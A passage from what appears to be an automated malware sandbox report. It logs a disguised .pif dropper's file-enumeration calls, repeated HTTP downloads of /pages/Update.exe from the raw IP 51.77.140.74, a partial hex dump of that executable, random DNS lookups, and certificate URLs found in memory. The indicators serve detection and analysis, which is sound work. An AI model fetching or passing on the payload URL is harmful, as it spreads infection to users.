            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_004370FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_004370FE
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0042D65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_0042D65B
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0042D98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_0042D98E
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00439DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00439DB1
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00439F0C SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00439F0C
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\287175Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\287175\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 21:14:22 GMTServer: Apache/2.4.61 (Debian)Last-Modified: Mon, 22 Jul 2024 15:09:34 GMTETag: "52aa099-61dd76ecaa548"Accept-Ranges: bytesContent-Length: 86679705Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 42 75 9e 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 7a 35 2b 05 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: GET /pages/Update.exe HTTP/1.1Host: 51.77.140.74Connection: Keep-Alive
            Source: unknownDNS traffic detected: query: uJZnxDofibxcgfjvDTnvqoPmvCzWh.uJZnxDofibxcgfjvDTnvqoPmvCzWh replaycode: Name error (3)
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: unknownTCP traffic detected without corresponding DNS query: 51.77.140.74
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0043D5B3 InternetReadFile,SetEvent,GetLastError,SetEvent,19_2_0043D5B3
            Source: global trafficHTTP traffic detected: GET /pages/Update.exe HTTP/1.1Host: 51.77.140.74Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: uJZnxDofibxcgfjvDTnvqoPmvCzWh.uJZnxDofibxcgfjvDTnvqoPmvCzWh
            Source: powershell.exe, 00000019.00000002.2548439087.0000000005167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.140.74
            Source: powershell.exe, 0000001F.00000002.2576897760.00000000053A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.140.74/p
            Source: powershell.exe, 00000019.00000002.2548439087.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548439087.0000000005086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2576897760.0000000005251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2576897760.00000000053A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.140.74/pages/Update.exe
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879FE000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FBA0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879FE000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FBA0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: powershell.exe, 00000019.00000002.2547145294.0000000003131000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2575583084.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: powershell.exe, 00000019.00000002.2547145294.0000000003131000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2575583084.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: powershell.exe, 00000019.00000002.2554339999.000000000769E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft8
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879FE000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FBA0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 